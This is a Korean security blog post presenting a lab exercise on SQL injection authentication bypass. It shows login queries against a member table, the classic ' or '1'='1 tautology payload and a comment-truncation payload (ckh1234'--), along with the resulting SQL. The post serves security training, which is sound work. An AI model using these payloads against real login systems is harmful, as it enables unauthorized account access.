Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
Tags
- Web
- Web Authentication
- docker
- snmp
- stored procedure
- IDS
- AWS
- ncloud
- VPC
- HSRP
- UTM
- DHCP
- Router Firewall
- arp
- Websec
- Linux
- XSS
- csrf
- 보안 솔루션
- Mass SQL Injection
- Vlan
- Database Scheme
- Blind SQL Injection
- RDS
- NETSEC
- WAF
- sql injection
- VPN
- SQL
- wireshark
Archives
- Today
- Total
yuil :: SecOps
[WebSec] SQL Injection 실습 - 인증우회 본문
SQL Injection을 이용한 인증우회
xp
-- id : nuno
-- pw: laksjdfl
select user_id, user_pw, name, email, homepage
from member
where user_id='nuno'
and user_pw='laksjdfl'
-- id : nuno
-- pw: dlaudtn
select user_id, user_pw, name, email, homepage
from member
where user_id='nuno'
and user_pw='dlaudtn'
select * from member where 1=1
select * from member where 1=0
-- id : ' or '1'='1
-- pw: ' or '1'='1
select user_id, user_pw, name, email, homepage
from member
where user_id='' or '1'='1'
and user_pw='' or '1'='1'
' or '1'='1
-- id : ckh1234'--
-- pw: anything
select user_id, user_pw, name, email, homepage
from member
where user_id='ckh1234'--and user_pw='anything'
반응형
'실습 > Web Security 실습' 카테고리의 다른 글
| [WebSec] SQL Injection 실습 - UNION (0) | 2025.10.21 |
|---|---|
| [WebSec] SQL Injection 실습 - 변환 에러 (0) | 2025.10.21 |
| [WebSec] SQL Injection 방어-우회-방어 정리 (0) | 2025.10.21 |
| [WebSec] SQL Injection 방어 Lab 02 (0) | 2025.10.21 |
| [WebSec] SQL Injection 방어 우회 실습 (0) | 2025.10.21 |
'실습/Web Security 실습' Related Articles
more
